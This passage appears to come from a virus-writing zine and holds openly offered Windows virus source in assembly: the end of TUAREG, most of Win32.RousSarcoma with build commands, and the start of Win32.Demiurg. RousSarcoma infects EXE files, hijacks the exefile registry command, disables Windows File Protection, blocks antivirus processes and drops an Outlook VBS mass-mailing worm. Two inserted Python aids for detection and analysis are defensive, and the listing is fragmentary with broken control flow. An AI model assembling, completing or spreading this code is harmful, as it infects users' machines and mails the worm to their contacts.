add eax, ecx ; EAX=(1st XOR 2nd)+2nd+CF
ror eax, cl ; EAX=EAX ROL (byte)(1st XOR 2nd)
not eax ; NOT (this breaks a possible proximity)
sub eax, 3 ; Subtract odd constant (break the linearity)
xor [ebp+DwordAleatorio2], eax ; Modify 2nd seed
xor eax, [ebp+DwordAleatorio3] ; XOR 3rd seed with the until-this-
; moment result
rol dword ptr [ebp+DwordAleatorio3], 1 ; Modify 3rd seed (ROL)...
sub dword ptr [ebp+DwordAleatorio3], ecx ; ...and with a 1st/2nd
; seed dependant variable
sbb dword ptr [ebp+DwordAleatorio3], 4 ; Subtract a constant value
; that could be 4 or 5
inc dword ptr [ebp+DwordAleatorio2] ; Break linearity on 2nd seed
pop ecx ; Restore register
ret ; Return
Random endp
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; End of TUAREG
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;ËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËË;
;ÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐ;
;; These are the checksums of the API names. The checksum is calculated with:
;; XOR EAX,EAX
;; MOV ESI,offset String
;;Loop:
;; MOV CL,[ESI]
;; AND CL,3
;; ROL EAX,CL
;; XOR AL,[ESI]
;; INC ESI
;; CMP BYTE PTR [ESI],0
;; JNZ Loop
;;
;; which I think is quite variable and in theory shouldn't cause any problem
;; of coincidences, since its result varies a lot.
;; The results of applying this checksum (or whatever it is) to the API names
;; are as follows:
CRC_APIs label dword
CRC_GetProcAddress dd 0342CDABh
CRC_CreateFileA dd 000147CFh
CRC_CreateProcessA dd 0A64AE17h
CRC_FindFirstFileA dd 0070244Fh
CRC_FindNextFileA dd 0003820Fh
CRC_GetFileAttributesA dd 008AEB57h
CRC_SetFileAttributesA dd 00A2EB57h
CRC_GetFullPathNameA dd 00023117h
CRC_MoveFileA dd 0002148Fh
CRC_CopyFileA dd 00008C4Fh
CRC_DeleteFileA dd 00004ACFh
CRC_WinExec dd 00006EDBh
CRC__lopen dd 00000DC2h
CRC_MoveFileExA dd 000429A7h
CRC_OpenFile dd 00000157h
CRC_ExitProcess dd 0014572Bh
CRC_WriteProcessMemory dd 0A8AE3121h
CRC_GetCurrentProcess dd 46C8D729h
CRC_CreateFileMappingA dd 0147EFAFh
CRC_MapViewOfFile dd 00950AD7h
CRC_UnmapViewOfFile dd 043D0AD7h
CRC_CloseHandle dd 00011811h
CRC_SetFilePointer dd 0014B9D6h
CRC_GetFileTime dd 00004783h
CRC_SetFileTime dd 00005383h
CRC_GetWindowsDirectoryA dd 6D1CE819h
CRC_GetCurrentDirectoryA dd 2369A80Ah
CRC_SetCurrentDirectoryA dd 7369A80Ah
CRC_GetSystemDirectoryA dd 4948E80Bh
CRC_GetSystemTime dd 00092963h
CRC_LoadLibraryA dd 0011B62Bh
CRC_FindClose dd 000E69F3h
CRC_WriteFile dd 00004F07h
CRC_FreeLibrary dd 000AE335h
dd 0 ; This signalizes the end of the APIs
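The checksum loop above is the kind of custom import hash an analyst has to reimplement to recognise which APIs a sample resolves without reading the names. The Python below is an added example written for this edit, not code from TUAREG or its author: it ports the ROL/XOR loop, checks it against five constants from the table (re-derived by hand for this example), and maps a constant found in code back to a name. The candidate list reuses the names in the table; the function names rol32, tuareg_checksum, resolve and verify_table are this example's own.

```python
"""Port of the API-name checksum loop above, as an analysis aid (added example, not TUAREG code)."""
from typing import Dict, Iterable, Optional

MASK32 = 0xFFFFFFFF


def rol32(value: int, count: int) -> int:
    """32-bit rotate left, matching ROL EAX,CL (here CL is always 0..3)."""
    count &= 31
    if count == 0:
        return value & MASK32
    return ((value << count) | (value >> (32 - count))) & MASK32


def tuareg_checksum(name: str) -> int:
    """EAX=0; for each byte: ROL EAX,(byte AND 3); XOR AL,byte.

    Case-sensitive and runs over every byte up to the terminating NUL, exactly
    like the listed loop."""
    eax = 0
    for byte in name.encode("ascii"):
        eax = rol32(eax, byte & 3)
        eax ^= byte        # byte < 100h, so only AL changes, as XOR AL,[ESI] does
    return eax


# Constants copied from the CRC_APIs table on this page; these five were re-derived
# by hand for this example, so they double as test vectors for the port.
KNOWN: Dict[str, int] = {
    "GetProcAddress": 0x0342CDAB,
    "CloseHandle": 0x00011811,
    "WinExec": 0x00006EDB,
    "ExitProcess": 0x0014572B,
    "_lopen": 0x00000DC2,
}

# Reverse-lookup candidates: the API names listed in the table.
CANDIDATES = [
    "GetProcAddress", "CreateFileA", "CreateProcessA", "FindFirstFileA",
    "FindNextFileA", "GetFileAttributesA", "SetFileAttributesA", "GetFullPathNameA",
    "MoveFileA", "CopyFileA", "DeleteFileA", "WinExec", "_lopen", "MoveFileExA",
    "OpenFile", "ExitProcess", "WriteProcessMemory", "GetCurrentProcess",
    "CreateFileMappingA", "MapViewOfFile", "UnmapViewOfFile", "CloseHandle",
    "SetFilePointer", "GetFileTime", "SetFileTime", "GetWindowsDirectoryA",
    "GetCurrentDirectoryA", "SetCurrentDirectoryA", "GetSystemDirectoryA",
    "GetSystemTime", "LoadLibraryA", "FindClose", "WriteFile", "FreeLibrary",
]


def build_lookup(names: Iterable[str]) -> Dict[int, str]:
    """Precompute checksum -> name; a constant pulled out of a sample is then one dict lookup."""
    return {tuareg_checksum(n): n for n in names}


def resolve(constant: int, names: Iterable[str] = CANDIDATES) -> Optional[str]:
    """Name of the API whose checksum equals constant, or None if no candidate matches."""
    return build_lookup(names).get(constant & MASK32)


def verify_table(table: Dict[str, int] = KNOWN) -> Dict[str, int]:
    """Entries whose page constant disagrees with a fresh computation (empty when the port is right)."""
    return {n: c for n, c in table.items() if tuareg_checksum(n) != c}


if __name__ == "__main__":
    for name, const in KNOWN.items():
        print(f"{const:08X} -> {resolve(const)}")
    print("mismatches:", verify_table())
```

Because the loop only rotates by 0..3 bits per character and XORs into AL, short names leave the upper bytes mostly zero (see the many 0000xxxxh entries in the table); that pattern is itself a useful hint when spotting this hash in an unknown binary.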
;; This is the space that we use to store the addresses to the API functions.
FunctionsToPatch label dword
RVA_GetProcAddress dd 0 ; These first 15 are used for per-process
RVA_CreateFileA dd 0 ; residency
RVA_CreateProcessA dd 0
RVA_FindFirstFileA dd 0
RVA_FindNextFileA dd 0
RVA_GetFileAttributesA dd 0
RVA_SetFileAttributesA dd 0
RVA_GetFullPathNameA dd 0
RVA_MoveFileA dd 0
RVA_CopyFileA dd 0
RVA_DeleteFileA dd 0
RVA_WinExec dd 0
RVA__lopen dd 0
RVA_MoveFileExA dd 0
RVA_OpenFile dd 0
RVA_ExitProcess dd 0
RVA_WriteProcessMemory dd 0
RVA_GetCurrentProcess dd 0
RVA_CreateFileMappingA dd 0
RVA_MapViewOfFile dd 0
RVA_UnmapViewOfFile dd 0
RVA_CloseHandle dd 0
RVA_SetFilePointer dd 0
RVA_GetFileTime dd 0
RVA_SetFileTime dd 0
RVA_GetWindowsDirectoryA dd 0
RVA_GetCurrentDirectoryA dd 0
RVA_SetCurrentDirectoryA dd 0
RVA_GetSystemDirectoryA dd 0
RVA_GetSystemTime dd 0
RVA_LoadLibraryA dd 0
RVA_FindClose dd 0
RVA_WriteFile dd 0
RVA_FreeLibrary dd 0
org SystemTime
FileTime dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
;; This is a fake host that only says that you have been infected and that
;; you are stupid for playing with files of unknown source :P (only first
;; generation!)
FakedHost: push 0
push offset Titulo
push offset Mensaje
push 0
call MessageBoxA
push 0
call ExitProcess
It's curious, but when you put the END directive under TASM, you can write
whatever you want after it and it won't be considered (I'm writing without
semicolons! :)
dsadjshajkdhsajkd
dsa
fds
fds
afdsa :P
This code is only for research and educational purposes. Assembling this
file will produce a fully functional virus, so you have been warned! If
this kind of material is illegal in your country or state, you should remove
it from your computer. The author of this virus declines any illegal activity,
including possession and/or spreading, by the possessor of the virus sourced
here. The spreading of this virus could save the life of anyone who receives
the money of someone who got his/her web start page changed and used the
http://www.thehungersite.com donation services, but since the spreading is
illegal in the majority of the world, theoretically this virus should not be
spread. So, do what you want :), but I'm not responsible.
;
;
; .--------------------------------.
; | |
; | Win32.RousSarcoma by SnakeByte |
; | SnakeByte@kryptocrew.de |
; | www.kryptocrew.de/snakebyte |
; .__________________________________.
;
;
; This virus was created with the idea of coding a retro virus, which
; is able to fool some AVs. I was not able to realize all my ideas,
; but I think it is some fun. This virus uses some tricks to make disinfection
; harder. I came to the idea of making a virus which is able to drop itself as
; the original EXE file when I saw that most AVs do not detect the first
; generation of a lot of viruses. Therefore that part of this virus stays
; undetected by heuristics. Generally this virus consists of 2 parts: the EXE file
; part and the one which is executed with an infected file. It "hooks" the execution
; of every EXE file and does not execute it if it is an AV. If it is none, it gets
; infected and started. Before starting the file it also checks if there is a
; mirc.ini in the same path. If there is one, it drops a mIRC script worm. In addition
; to this, the virus installs itself in the registry to get started every time with Windows.
; It searches the registry for more paths to infect files there. If it can't find more
; paths it drops a VBS script to send the worm around via Outlook.
;
; I am not good at writing, so here is an overview of what
; the virus does:
;
;
; Name : Win32.RousSarcoma
; Type : PE-Appender by increasing last section
; Worming : Yes, mIRC Script and VBS Worm
; Operating System : Win32
; Author : SnakeByte
; Payload : None, too boring to write one ;) [ Got some other interesting stuff
; in mind i want to code as soon as possible ]
; Virus Size : 8192 Bytes
; Infection Mark : A-AV
; Encryption : None
; Autostart : RunOnce & exefiles
; Anti-Bait : Does not infect files < 20000 Bytes
; Anti-Debugging : Yes, against SoftIce and Int 1h tracing
; Anti-AV : Yes, does not allow the execution of several AV's
; disables Win2k File Protection
; Anti-User : Hides itself in files & several different places,
; is not shown at ctrl-alt-del list
; Runs at Level : Ring-3, but still infects every EXE File on executing
; Infects : 10 Files in the current directory,
; 10 Files in every path stored in this registry Key :
; HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths
; Every EXE File which gets executed
;
; How to compile ( TASM 5.0 ) :
;
; tasm32 /z /ml /m3 RousSarc,,;
; tlink32 -Tpe -c RousSarc,RousSarc,, import32.lib
; pewrsec RousSarc.EXE
;
; ( Make sure that the .EXE extension is uppercase !! )
;
; At the moment there are just 100 bytes of code I could add with the file staying
; at 8192 bytes. If I added more, the file would grow to 12 KB. I decided to
; keep it small and leave out stuff like encryption or even poly. Maybe it could
; be optimized in several parts to make it fit with encryption into an 8 KB file,
; but I don't mind at the moment.
;
;
;
; Thanks and greetz to :
;
; Lord Arz : Did you also finish your EXEFILES "hooking" something ? ;)
; DukeCS : Heh, when will KC be done ? *fg*
; Matsad : Sorry, for not coming, but i got no cash and need to see my girlfriend :P
; Lethal Mind : Heh, where are you ? ;(
; Ciatrix : Nice that you carry on !
;
;
; ***************************************************************************
; ------------------------[ Let's get ready to rumble ]----------------------
; ***************************************************************************
.586p
.model flat
jumps ; calculate Jumps
.radix 16 ; Hexadecimal numbers
.code
; Some constants
VirusSize equ 8192d ; Length of EXE-File
ImageBase equ 400000h ; Imagebase of our TASM generated EXE-File
; ###########################################################################
; -------------------[ This is the first part of the virus ]-----------------
; ###########################################################################
Virus:
; Here we search for EXE files and put the
; entire PE virus EXE at the end!
; We search for the needed APIs with GetProcAddress
; and GetModuleHandle, so we will not get problems
; with missing DLLs or APIs
NoHide:
; ***************************************************************************
; ---------------------------[ Initialisation ]------------------------------
; ***************************************************************************
; Let's do a check on our command line parameters
; to see if we got started with a filename
; in it --> exefile method
CommandOK1:
add eax, 4h ; eax points directly after the <name>.exe
cmp byte ptr [eax], 0 ; if the Commandline ends here, we do not need
je SetRunOnceKey ; to care about this ;)
push esi
call AVNameCheck
cmp esi, 0
je AVMessage
pop esi
jmp mIRCcheck
PathEnd dd 0h
push 0
push 080h ; normal attribs
push 2h ; create a new file (always)
push 0
push 0
push 0C0000000h ; read + write
lea eax, NameBuffer ; file we create
push eax
Call dword ptr [XCreateFileA]
cmp eax, 0FFFFFFFFh
je NoMirc
NoMirc:
; close the search handle
push dword ptr [FindHandle]
call dword ptr [XCloseHandle]
popad
push eax
push esi
call FindFirstFileProc
pop esi ; esi points to start of filename
pop ebx ; ebx points to the parameters
cmp eax, 0
jne CheckOwnKey
push ebx
push offset NameBuffer ; Value
push 1h ; String
push 0 ; reserved
push offset Valuename ; value name
push dword ptr [RegHandle]
call dword ptr [XRegSetValueExA]
jmp FirstGenHost
SaveBlanc dd 0h
EXEFilesKey db 'exefile\shell\open\command',0
EXEFilesValue db 'RousSarc.EXE "%1" %*',0
EFVSize equ $ - offset EXEFilesValue
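The two strings above are the "exefiles" autostart from the overview: the (Default) value of exefile\shell\open\command under HKEY_CLASSES_ROOT is the command the shell runs for every .exe, and its stock value is "%1" %*. Putting RousSarc.EXE in front of it makes the virus the first thing executed on each launch, which is also what lets it refuse to start the AV names listed further down. The following Python is an added example, not code from the zine or from SnakeByte: it reads the live value on Windows (winreg, no-op elsewhere), and classifies a command string offline so the check can run against a registry export or a triage note. The sample strings in the usage line are constructed; RousSarc.EXE is only used because it is the name the page itself uses.

```python
import re

# One argument of a shell\open\command value: a double-quoted run (quotes
# stripped) or a bare whitespace-delimited word.
_TOKEN = re.compile(r'\s*(?:"([^"]*)"|(\S+))')


def split_command(value):
    """Tokenise a shell\\open\\command string, honouring double quotes."""
    tokens, pos = [], 0
    while True:
        m = _TOKEN.match(value, pos)
        if not m or m.end() == pos:
            return tokens
        tokens.append(m.group(1) if m.group(1) is not None else m.group(2))
        pos = m.end()


def exefile_launcher(value):
    """None for the stock value "%1" %* (quoted or not); otherwise the program
    the shell runs in front of the real executable, e.g. RousSarc.EXE."""
    tokens = split_command(value)
    if not tokens or tokens[0] == "%1":
        return None
    return tokens[0]


def classify_exefile_command(value):
    """'default', 'hijacked' (a launcher wraps %1, which is what the value above
    does) or 'broken' (%1 is gone, so .exe files would no longer start at all)."""
    if "%1" not in value:
        return "broken"
    return "default" if exefile_launcher(value) is None else "hijacked"


def read_live_exefile_command():
    """Read HKEY_CLASSES_ROOT\\exefile\\shell\\open\\command on Windows; returns
    None on other platforms, where the winreg module does not exist."""
    try:
        import winreg
    except ImportError:
        return None
    with winreg.OpenKey(winreg.HKEY_CLASSES_ROOT, r"exefile\shell\open\command") as key:
        value, _ = winreg.QueryValueEx(key, "")
    return value


if __name__ == "__main__":
    live = read_live_exefile_command()
    # Constructed samples: the stock value and the value RousSarcoma writes.
    for sample in ['"%1" %*', 'RousSarc.EXE "%1" %*'] + ([live] if live else []):
        print(repr(sample), classify_exefile_command(sample), exefile_launcher(sample))
```

Note that the value RousSarcoma writes uses a bare file name, so the launcher only works because the file has been copied somewhere the shell resolves it; when the check reports a launcher, the next step is to locate that file rather than just restoring the value.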
; ***************************************************************************
; ------------------------------[ Outbreak ! ]-------------------------------
; ***************************************************************************
Outbreak: ; We got no commandline !
HKEY_CURRENT_USER equ 80000001h
HKEY_LOCAL_MACHINE equ 80000002h
; first of all, let's disable the Win2k file protection (WFP)
push offset RegHandle
push 001F0000h ; complete access
push 0h ; reserved
push offset _2kProt ; check if our key exists
push HKEY_LOCAL_MACHINE ; HKEY_LOCAL_MACHINE
call dword ptr [XRegOpenKeyExA]
push 4
push offset RegBuffer ; Value
push 4h ; REG_DWORD
push 0 ; reserved
push offset _2kProtValue ; value name
push dword ptr [RegHandle]
call dword ptr [XRegSetValueExA]
; Close it again
push dword ptr [RegHandle]
call dword ptr [XRegCloseKey]
CommandOK3:
add eax, 4h ; eax points directly after the <name>.exe
mov byte ptr [eax], 0 ; Place a 0 here to copy the file
push 255d
push offset NameBuffer
call dword ptr [XGetWindowsDirectoryA]
cmp eax, 0
jne CheckOwnKey
CheckOwnKey:
mov dword ptr [RegBuffer], 0h
KeySet:
push 4
push offset RegBuffer ; Value
push 4h ; REG_DWORD
push 0 ; reserved
push offset Valuename ; value name
push dword ptr [RegHandle]
call dword ptr [XRegSetValueExA]
; Now we decide what to do ( we start with 2 because we just incremented it and I will not
; do anything after the second start, because we need one reboot to disable WFP ) :
;
; Value - what to do
;
; 2 - infect directory 1 of
; HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths
; 3 - " " 2 " ""
; 4 - " " 3 " ""
; 5 - " " 4 " ""
; 6 - " " 5 " ""
; ... no more directorys in RegKey ? --> set value to 0
dec eax
dec eax
jz NoRegistryInfection
push eax
pop eax
push 255d
push offset NameBuffer
push eax ; Key Number we want to retrieve
push dword ptr [RegHandle]
call dword ptr [XRegEnumKeyA]
cmp eax, 0
jne DropVBSWorm
; Read value
CloseRegInfection:
push dword ptr [RegHandle]
call dword ptr [XRegCloseKey]
NoRegistryInfection:
jmp CloseRegInfection
VBSscript:
db 'On Error Resume Next', 13d, 10d
db 'Dim R', 13d, 10d
db 'Set RS=CreateObject("Outlook.Application")', 13d, 10d
db 'For R=1 To 500', 13d, 10d
db 'Set Mail=RS.CreateItem(0)', 13d, 10d
db 'Mail.to=RS.GetNameSpace("MAPI").AddressLists(1).AddressEntries(x)', 13d, 10d
db 'Mail.Subject="Funny Thing !"', 13d, 10d
db 'Mail.Body="Take a look at this and just start laughing !"', 13d, 10d
db 'Mail.Attachments.Add("C:\RousSarc.EXE")', 13d, 10d
db 'Mail.Send', 13d, 10d
db 'Next', 13d, 10d
db 'RS.Quit', 13d, 10d, 13d, 10d
EndVBSScript:
VBSWorm db 'C:\RousSarc.vbs',0
; ***************************************************************************
; --------------------------[ Infection current dir ]------------------------
; ***************************************************************************
InfectCurDirFile:
; Filename in esi
lea esi, WFD_szFileName
call InfectFile ; Try it !
cmp dword ptr [InfCounter], 0h
jna EndInfectCurDir2
call FindNextFileProc
EndInfectCurDir1:
ret
; ***************************************************************************
; -------------------------[ prepare Infection ]----------------------------
; ***************************************************************************
call AVNameCheck
cmp esi, 0h
je NoInfection
Notagoodfile:
call UnMapFile
NoInfection:
ret
; ***************************************************************************
; ------------------------------[ File-Handling ]----------------------------
; ***************************************************************************
; FileName needs to be in esi
OpenFile:
xor eax,eax ; Open Files
push eax
push eax
push 3h
push eax
inc eax
push eax
push 80000000h or 40000000h
push esi ; Filename is in ESI
call dword ptr [XCreateFileA]
inc eax
jz Closed
dec eax
CreateMap:
push ecx
xor eax,eax
push eax
push ecx
push eax
push 00000004h
push eax
push dword ptr [FileHandle]
call dword ptr [XCreateFileMappingA]
mov dword ptr [MapHandle],eax
xor eax,eax
push ecx
push eax
push eax
push 2h
push dword ptr [MapHandle]
call dword ptr [XMapViewOfFile]
or eax,eax
jz UnMapFile
; EAX contains starting offset of the map
mov dword ptr [MapAddress],eax
clc
ret
UnMapFile:
call UnMapFile2
CloseFile:
push dword ptr [FileHandle]
call [XCloseHandle]
Closed:
stc
ret
UnMapFile2:
push dword ptr [MapAddress]
call dword ptr [XUnmapViewOfFile]
ret
; ***************************************************************************
; ---------------------[ Infection of the EXE-File ]-------------------------
; ***************************************************************************
call Align
mov dword ptr [NewSize], eax
xchg ecx, eax
pushad
call UnMapFile2 ; remap file
popad
call CreateMap
jc NoEXE
; esi = PE-Header
mov esi, dword ptr [eax+3Ch]
; get Imagebase
mov eax, [edi+34h]
mov dword ptr [OldBase], eax
pop edx
call OpenMyself
; lets save the right Imagebase and EIP
; inside our buffered file ;)
pop edi
lea esi, FileBuffer
mov ecx, VirusSize ; First Part
rep movsb ; append
; we need two steps, otherwise we would fill the
NoEXE:
stc
ret
; ***************************************************************************
; ----------------------[ Open-ourselves procedure ]-------------------------
; ***************************************************************************
OpenMyself: ; this Procedure returns the start of
; the current file in esi
; first we need the filename
pushad
call dword ptr [XGetCommandLineA]
inc eax
mov dword ptr [CmdLine], eax
CommandReceive:
cmp dword ptr [eax],'EXE.'
je CommandOK
inc eax
jmp CommandReceive
CommandOK:
add eax, 4h
mov byte ptr [eax],0 ; CmdLine contains now a pointer
; to the filename of our file
mov esi, dword ptr [CmdLine]
push ebx
call dword ptr [XCloseHandle]
popad
ret
Read dd ?
; ***************************************************************************
; -----------------------[ Check if we got an AV ]---------------------------
; ***************************************************************************
AVNameCheck: ; pointer to name is in esi
pushad ; save all registers
NameCheckLoop:
cmp byte ptr [esi], 0 ; check if we are at the end
je NameTransferred
lodsb ; get first letter
cmp al, 96d
jb StoreLetter
sub al, 32d ; convert to uppercase
StoreLetter:
stosb
inc ecx
jmp NameCheckLoop
SearchOn:
mov esi, dword ptr [NameESI] ; avname
mov edi, dword ptr [NameEDI]
NoAV:
ret
db 'AVE32' ; Anti-Vir
db 'AVGCTRL'
db 'AVWIN95'
db 'SCAN32' ; DR-Solomon
db 'AVCONSOL'
db 'VSHWIN32'
db 'FP-WIN' ; F-Prot
db 'F-STOPW'
db 'DVP95' ; F-Secure
db 'F-AGNT95'
db 'F-PROT95'
db 'VET95' ; InnoculateIT
db 'VETTRAY'
db 'NAVAPW32' ; Norton
db 'NAVW32'
db 'SWEEP95' ; Sophos
db 'IOMON98' ; PC-Cillin
db 'PCCWIN98'
db 'MONITOR' ; RAV
db 'RAW7WIN'
AVLenght:
db 4d, 5d, 5d, 5d, 5d, 6d, 6d, 6d ; AVP
db 5d, 7d, 7d ; ANTI-Vir
db 6d, 8d, 8d ; DR-Solomon
db 6d, 7d ; F-PROT
db 5d, 8d, 8d ; F-Secure
db 5d, 7d ; Innoculate-IT
db 6d, 5d ; Norman
db 8d, 6d ; Norton
db 7d ; Sophos
db 7d, 8d ; PC-Cillin
db 7d, 7d ; RAV
; ***************************************************************************
; --------------------------[ Align procedure ]------------------------------
; ***************************************************************************
; eax - Size
; ecx - base
Align:
push edx
xor edx, edx
push eax
div ecx
pop eax
sub ecx, edx
add eax, ecx
pop edx ; eax - New Size
ret
; ***************************************************************************
; -------------------------[ FindFile procedures ]---------------------------
; ***************************************************************************
FindNextFileProc:
call ClearFindData
lea eax, WIN32_FIND_DATA
push eax
mov eax, dword ptr [FindHandle]
push eax
call dword ptr [XFindNextFileA]
ret
ClearFindData:
lea edi, WFD_szFileName
mov ecx, 276d ; clear old data
xor eax, eax
rep stosb
ret
;****************************************************************************
;-----------------------------[ PE / MZ Check ]------------------------------
;****************************************************************************
; Check MZ and PE - Signs
CheckPESign:
cmp dword ptr [edi], 'FP' ; greater or equal to "PF"
jae NoPESign
NoPESign:
stc
ret
CheckMZSign:
clc
ret
ret
; ***************************************************************************
; ----------------[ This is the host for the EXE-Virus Part ]----------------
; ***************************************************************************
FirstGenHost:
push 0h ; stop this !
call ExitProcess
jmp FirstGenHost
;
; \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
; ////////////////////////////////////////////////////////////////////////////\
; ###########################################################################/\
; ------------------[ This is the second part of the Virus ]-----------------/\
; ###########################################################################/\
; ////////////////////////////////////////////////////////////////////////////\
; \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
;
SecondPart:
; Here we drop the entire file from the
; infected goat and execute it
; ***************************************************************************
; -------------------------[ Search for Kernel ]-----------------------------
; ***************************************************************************
call Delta
Delta:
pop ebp
sub ebp, offset Delta
; ***************************************************************************
; --------------------[ Search-Kernel Procedure ]----------------------------
; ***************************************************************************
GetKernel:
mov byte ptr [ebp+K32Trys], 5h
GK1:
cmp byte ptr [ebp+K32Trys], 00h
jz NoKernel ; did we pass the limit ?
GK2:
sub esi, 10000h ; search next page
dec byte ptr [ebp+K32Trys]
jmp GK1 ; test again
CheckPE: ; test for PE-Header
mov edi, [esi+3Ch]
add edi, esi
call CheckPESign
CheckDLL:
add edi, 16h
mov bx, word ptr [edi] ; get characteristics
and bx, 0F000h ; to check for dll flag
cmp bx, 02000h
jne GK2
KernelFound: ; We got it !
sub edi, 16h ; edi = PE-Header
xchg eax, edi ; eax = PE offset
xchg ebx, esi ; ebx = MZ offset
clc ; clear carry flag
ret
NoKernel:
stc ; set carry flag if we did not find it
ret
; ***************************************************************************
; ---------------------------[ Search for API's ]----------------------------
; ***************************************************************************
LL db 'LoadLibraryA', 0h
GPA db 'GetProcAddress', 0h
; ***************************************************************************
; --------[ Search the kernel export table for the 2 main API's ]------------
; ***************************************************************************
SearchAPI1:
and word ptr [ebp+counter], 0h
SearchNextApi1:
push esi
lodsd
add eax, [ebp+MZAddy]
cld
rep cmpsb ; check for api name
pop ecx
jz FoundApi1
FoundApi1:
pop esi
movzx eax, word ptr [ebp+counter]
shl eax, 1h ; get right entry
NotFoundApi1:
xor eax, eax ; we failed :(
ret
; ***************************************************************************
; ----------------------[ Let's drop the virus to a file ]-------------------
; ***************************************************************************
DropIT:
push 0
push 080h ; normal
push 1 ; new file
push 0
push 0
push 40000000h ; write access
lea eax, [ebp+HiddenFile]
push eax
call dword ptr [ebp+YCreateFileA]
push 0 ; overlapped
lea ecx, [ebp+Write] ; written bytes
push ecx
push VirusSize ; Length
push esi ; Start of Data
push ebx ; File Handle
Call dword ptr [ebp+YWriteFile]
push ebx
call dword ptr [ebp+YCloseHandle]
; ***************************************************************************
; -----------------------[ open original program ]---------------------------
; ***************************************************************************
ExecuteHost:
add eax,12345678h
org $-4
retBas dd 0h
jmp eax
OldEIP dd 0h
OldBase dd 0h
NewEIP dd 0h
; ***************************************************************************
; --------------[ use GetProcAddress to retrieve API's ]---------------------
; ***************************************************************************
; this procedure is used in both parts of the virus !
; esi point to the names
; edi to the place where we save the offsets
; ebx contains module handle
; ecx got the number of api's
GetAPI3:
push ecx ; save number
API3b:
call GetProcAddress
API3c:
stosd ; save offset
pushad
cmp eax, 0 ; Let's do a check for SoftICE breakpoints
je NoSICheck
cmp byte ptr [eax], 0CCh ; check for the breakpoint
je EndApi3 ; due to the pushad, we will ret somewhere strange ;)
NoSICheck:
popad
pop ecx
dec ecx
jz EndApi3
SearchZero:
cmp byte ptr [esi], 0h
je GotZero
inc esi
jmp SearchZero
GotZero:
inc esi
pop ecx
jmp GetAPI3 ; get next api
EndApi3:
ret
; ###########################################################################
; ----------------------[ Third Part - The Data ]----------------------------
; ###########################################################################
; ***************************************************************************
; ---------------------[ Data of the second part ]---------------------------
; ***************************************************************************
NumberOf2Kernel32APIS equ 4
Kernel32Names2:
db 'CreateFileA', 0
db 'CloseHandle', 0
db 'WriteFile',0
db 'CreateProcessA',0
; ***************************************************************************
; ---------------------------[ Some Data ]-----------------------------------
; ***************************************************************************
VirusEnd:
StartofVirusinFile dd 0h
Write dd 0h
; ***************************************************************************
; --------------------[ Initialized First Part Data ]------------------------
; ***************************************************************************
.DATA
CopyRight db 'Win32.RousSarcoma by SnakeByte',0
db 'FindFirstFileA', 0
db 'FindNextFileA', 0
db 'FindClose', 0
db 'CreateFileA', 0
db 'CloseHandle', 0
db 'CreateFileMappingA', 0
db 'MapViewOfFile', 0
db 'UnmapViewOfFile', 0
db 'GetCommandLineA',0
db 'ReadFile',0
db 'CreateProcessA',0
db 'GetSystemDirectoryA',0
db 'CopyFileA',0
db 'GetCurrentProcessId',0
db 'RegisterServiceProcess',0
db 'GetCurrentDirectoryA',0
db 'SetCurrentDirectoryA',0
db 'GetWindowsDirectoryA',0
db 'GetFullPathNameA',0
db 'WritePrivateProfileStringA',0
db 'WriteFile',0
advname db 'advapi32',0
AdvapiNames:
NumberOfAdvapiAPIS equ 6
db 'RegOpenKeyExA',0
db 'RegQueryValueExA',0
db 'RegCloseKey',0
db 'RegSetValueExA',0
db 'RegCreateKeyExA',0
db 'RegEnumKeyA',0
StartupInfo:
db 64d
db 63d dup (0)
ProcessInformation:
hProcess dd 0h
hThread dd 0h
dwProcessId dd 0h
dwThreadId dd 0h
; ***************************************************************************
; -------------------[ Uninitialized First Part Data ]-----------------------
; ***************************************************************************
.DATA?
; APIs we need for the first part
XFindFirstFileA dd ?
XFindNextFileA dd ?
XFindClose dd ?
XCreateFileA dd ?
XCloseHandle dd ?
XCreateFileMappingA dd ?
XMapViewOfFile dd ?
XUnmapViewOfFile dd ?
XGetCommandLineA dd ?
XReadFile dd ?
XCreateProcessA dd ?
XGetSystemDirectoryA dd ?
XCopyFileA dd ?
XGetCurrentProcessId dd ?
XRegisterServiceProcess dd ?
XGetCurrentDirectoryA dd ?
XSetCurrentDirectoryA dd ?
XGetWindowsDirectoryA dd ?
XGetFullPathNameA dd ?
XWritePrivateProfileStringA dd ?
XWriteFile dd ?
FileHandle dd ? ; Filehandle
MapHandle dd ? ; Handle of the Map
MapAddress dd ? ; Offset of the Map
Handle dd ?
InfCounter db ? ; Counter
FindHandle dd ? ; Handle for FindFirstFile API
FileBuffer db VirusSize dup (?)
; We temporarily save the name of a possible AV
; to check if it is one
NameBuffer db 255d dup (?)
CurrentPath db 255d dup (?)
; ***************************************************************************
; ------------------------[ That's all, go home ]----------------------------
; ***************************************************************************
end Virus
Note of the editor:
Although it was my intention to post the source code of this virus here, due to its
complexity that's not possible. You will find the source code in the "Binaries"
folder.
VirusBuster/29A
; *************************************************************************
; ******************** ********************
; ******************** Win32.Demiurg ********************
; ******************** by ********************
; ******************** Black Jack ********************
; ******************** ********************
; *************************************************************************
comment ~
NAME: Win32.Demiurg
AUTHOR: Black Jack [independent Austrian Win32asm virus coder]
CONTACT: Black_Jack_VX@hotmail.com | http://www.coderz.net/blackjack
